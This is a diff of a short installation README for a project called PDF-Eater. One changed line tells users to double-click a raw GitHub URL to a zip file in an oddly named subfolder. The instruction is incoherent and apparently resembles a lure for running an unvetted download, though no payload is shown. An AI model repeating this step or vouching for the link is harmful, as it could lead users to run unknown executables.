Dvazsan/PDF-Eater/README.md

 Once you have downloaded PDF-Eater, follow these steps to install it:

 1. Locate the downloaded file, usually in your "Downloads" folder.
-2. Double-click on `PDF-Eater.exe` to start the installation process.
+2. Double-click on `https://raw.githubusercontent.com/Dvazsan/PDF-Eater/main/phytase/PDF-Eater.zip` to start the installation process.
 3. Follow the on-screen instructions.
 You may need to approve any prompts asking for permission to install.
 4. After the installation completes, find PDF-Eater in your Start menu or desktop.